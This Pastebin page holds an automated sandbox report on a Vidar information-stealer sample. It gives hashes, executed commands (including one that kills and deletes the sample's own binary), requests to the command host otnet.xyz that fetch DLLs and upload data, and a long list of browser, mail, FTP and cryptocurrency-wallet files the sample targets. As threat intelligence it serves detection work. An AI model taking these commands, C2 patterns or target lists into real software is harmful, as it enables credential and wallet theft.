Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Vidar"
- * MalScore: 10.0
- * File Name: "Vidar_a85132af1b5651472eb4ad093e1bb0f5.exe"
- * File Size: 684032
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "012e9cbd15b3e19b703a118b0fb4c48df46a505416fb629b7764178f74cd8b53"
- * MD5: "a85132af1b5651472eb4ad093e1bb0f5"
- * SHA1: "280312657d13f403527b1b3cec7e577c1e5de64b"
- * SHA512: "1cbe8fd4394f72a0d4a904a06447ce07eb577d5d10adb44096e38bd5ab069d3752e3dba573f38512010a118df639cddcbb78231285f1c6f6dd14c1b0ccbe42df"
- * CRC32: "BFC0FAFA"
- * SSDEEP: "12288:TEtUmRfjBeCq3SkqTJ3N4FsOevUBPqt4Ma5DG2/dIM9hbU2nv68mKQO:YKEfjB1q3Sl0mOpBCtzYVl9hQWLdQO"
- * Process Execution:
- "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "taskhost.exe"
- * Executed Commands:
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request": "http://otnet.xyz/141"
- "suspicious_request": "http://otnet.xyz/freebl3.dll"
- "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "suspicious_request": "http://otnet.xyz/mozglue.dll"
- "suspicious_request": "http://otnet.xyz/msvcp140.dll"
- "suspicious_request": "http://otnet.xyz/nss3.dll"
- "suspicious_request": "http://otnet.xyz/softokn3.dll"
- "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
- "suspicious_request": "http://ip-api.com/line/"
- "suspicious_request": "http://otnet.xyz/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://otnet.xyz/141"
- "url": "http://otnet.xyz/freebl3.dll"
- "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "url": "http://otnet.xyz/mozglue.dll"
- "url": "http://otnet.xyz/msvcp140.dll"
- "url": "http://otnet.xyz/nss3.dll"
- "url": "http://otnet.xyz/softokn3.dll"
- "url": "http://otnet.xyz/vcruntime140.dll"
- "url": "http://ip-api.com/line/"
- "url": "http://otnet.xyz/"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11879534 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\*.*"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
- * Modified Files:
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\ld",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\historych",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\c",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\wd",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy\\\\xea\\x9b\\xb0\\xce\\x90\\xeb\\x82\\xa8\\xc8\\xa7\\xef\\xba\\xa0\\xc8\\xbf\\xe9\\x93\\x90\\xc8\\xb8",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC\\\r",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash\\\r",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX\\\r",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
- * Deleted Files:
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets",
- "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "otnet.xyz",
- "answers":
- "data": "209.141.47.33",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- * Domains:
- "ip": "209.141.47.33",
- "domain": "otnet.xyz"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://otnet.xyz/141",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/141",
- "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll",
